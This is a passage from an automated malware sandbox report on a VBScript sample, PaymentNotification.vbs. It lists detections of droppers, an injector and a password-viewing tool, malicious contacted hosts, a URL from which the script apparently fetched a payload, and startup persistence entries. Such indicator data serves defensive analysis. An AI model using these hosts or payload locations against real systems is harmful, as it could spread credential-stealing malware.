13.2.tmpFB21.tmp.exe.8a0000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
1.0.Tmp.exe.1d0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.0.tmp87E4.tmp.exe.6e0000.0.unpack	100%	Avira	HEUR/AGEN.1135787	Download File
2.2.pgr.exe.80000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
3.2.servieda.exe.a0000.0.unpack	100%	Avira	HEUR/AGEN.1108374	Download File
2.0.pgr.exe.80000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
12.2.tmp87E4.tmp.exe.6e0000.0.unpack	100%	Avira	HEUR/AGEN.1135787	Download File
3.0.servieda.exe.a0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
1.2.Tmp.exe.1d0000.0.unpack	100%	Avira	HEUR/AGEN.1108374	Download File
2.2.pgr.exe.3a3fd88.3.unpack	100%	Avira	TR/Inject.vcoldi	Download File
15.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
neesoontat.com.my	0%	Virustotal		Browse
81.189.14.0.in-addr.arpa	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.carterandcone.com-E	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/96	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.fontbureau.comtua	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/3	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/3	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/3	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/vno8	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/wab	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.carterandcone.comafet6	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.fontbureau.comdita	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.carterandcone.comhly#	0%	Avira URL Cloud	safe
http://www.carterandcone.comMP_	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/L	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/L	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/L	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/r	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/r	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/r	0%	URL Reputation	safe
http://www.fontbureau.comcomF	0%	URL Reputation	safe
http://www.fontbureau.comcomF	0%	URL Reputation	safe
http://www.fontbureau.comcomF	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/het	0%	Avira URL Cloud	safe
http://fontfabrik.com;	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/i	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/i	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/i	0%	URL Reputation	safe
http://www.fontbureau.comitu	0%	URL Reputation	safe
http://www.fontbureau.comitu	0%	URL Reputation	safe
http://www.fontbureau.comitu	0%	URL Reputation	safe
http://www.founder.com.cn/cn)	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/G	0%	Avira URL Cloud	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/3	0%	Avira URL Cloud	safe
185.140.53.71	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cnlw	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnm	0%	URL Reputation	safe
http://www.founder.com.cn/cnm	0%	URL Reputation	safe
http://www.founder.com.cn/cnm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/arge	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/i	0%	Avira URL Cloud	safe
http://www.carterandcone.comfacb	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnu	0%	Avira URL Cloud	safe
http://www.carterandcone.com;	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
whatismyipaddress.com	104.16.154.36	true	false		high
ia601504.us.archive.org	207.241.227.114	true	false		high
neesoontat.com.my	103.6.196.196	true	true	0%, Virustotal, Browse	unknown
81.189.14.0.in-addr.arpa	unknown	unknown	false	0%, Virustotal, Browse	unknown
mail.neesoontat.com.my	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://whatismyipaddress.com/	false		high
185.140.53.71	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.carterandcone.com-E	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/96	tmpFB21.tmp.exe, 0000000D.00000003.496076219.0000000005AAC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comtua	tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/8	tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/3	tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/vno8	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/wab	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://whatismyipaddress.com/-	pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr	false		high
http://www.galapagosdesign.com/DPlease	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comafet6	tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.site.com/logs.php	tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://www.urwpp.deDPlease	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comdita	tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	tmpFB21.tmp.exe.2.dr	false		high
http://www.zhongyicts.com.cn	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://certificates.godaddy.com/repository/gdig2.crt0	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comhly#	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	tmp87E4.tmp.exe, 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comMP_	tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://2542116.fls.doubleclick.net/activi	vbc.exe, 0000000F.00000003.517667198.000000000210C000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/	tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.godaddy.com/gdig2s1-1597.crl0	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://certs.godaddy.com/repository/1301	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/L	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/G	tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://certs.godaddy.com/repository/0	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.godaddy.com/gdroot-g2.crl0F	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://crl.godaddy.com/gdroot-g2.crl0=w	wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/r	tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comcomF	tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/het	tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fontfabrik.com;	tmpFB21.tmp.exe, 0000000D.00000003.493276632.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/i	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comitu	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn)	tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/G	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://certificates.godaddy.com/repository/0	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers?	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.carterandcone.comal	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/3	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.com	tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://fontfabrik.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnlw	tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnm	tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/arge	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/i	tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comfacb	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnu	tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com;	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://login.yahoo.com/config/login	tmpFB21.tmp.exe	false		high
http://www.fonts.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.de	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmQK	tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp	false		high
https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt3u	wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comF	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0et	tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/udi	tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comessed8	tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ia601504.us.archive.org/3	wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/r	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/S	tmpFB21.tmp.exe, 0000000D.00000003.494591560.0000000005AA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.coma	tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comTTFd	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comd	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comdi	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt	wscript.exe, 00000000.00000003.340835595.000001B863D52000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.369127141.000001B865B94000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.361151297.000001B863DE7000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373459438.000001B865C70000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.368780987.000001B865B73000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373627611.000001B865F9B000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.monotype.	tmpFB21.tmp.exe, 0000000D.00000003.500377718.0000000005ADD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.g	wscript.exe, 00000000.00000003.340516433.000001B8665AF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.godaddy.com/gdroot.crl0F	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
https://ia601504.us.archive.org/	wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers8	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/uild	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.16.154.36	whatismyipaddress.com	United States	13335	CLOUDFLARENETUS	false
103.6.196.196	neesoontat.com.my	Malaysia	46015	EXABYTES-AS-APExaBytesNetworkSdnBhdMY	true
207.241.227.114	ia601504.us.archive.org	United States	7941	INTERNET-ARCHIVEUS	false
185.140.53.71	unknown	Sweden	209623	DAVID_CRAIGGG	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	399489
Start date:	28.04.2021
Start time:	20:48:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 7s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	PaymentNotification.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.adwa.spyw.evad.winVBS@22/17@5/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.4% (good quality ratio 10.8%) Quality average: 79.8% Quality standard deviation: 27.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 2.23.155.226, 2.23.155.211, 2.23.155.234, 2.23.155.192, 2.23.155.187, 2.23.155.194, 2.23.155.201, 2.23.155.185, 2.23.155.209, 2.20.142.210, 2.20.142.209, 67.26.139.254, 8.238.36.254, 8.248.149.254, 67.27.233.254, 67.26.137.254, 23.57.80.111 TCP Packets have been reduced to 100 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, 2-01-3cf7-0009.cdx.cedexis.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dscg3.akamai.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, download.windowsupdate.com.edgesuite.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:49:54	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
20:50:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe
20:50:30	API Interceptor	2x Sleep call for process: tmp87E4.tmp.exe modified
20:50:55	API Interceptor	75x Sleep call for process: tmpFB21.tmp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.16.154.36	YpyXT7Tnik.exe	Get hash	malicious	Browse	whatismyipaddress.com/
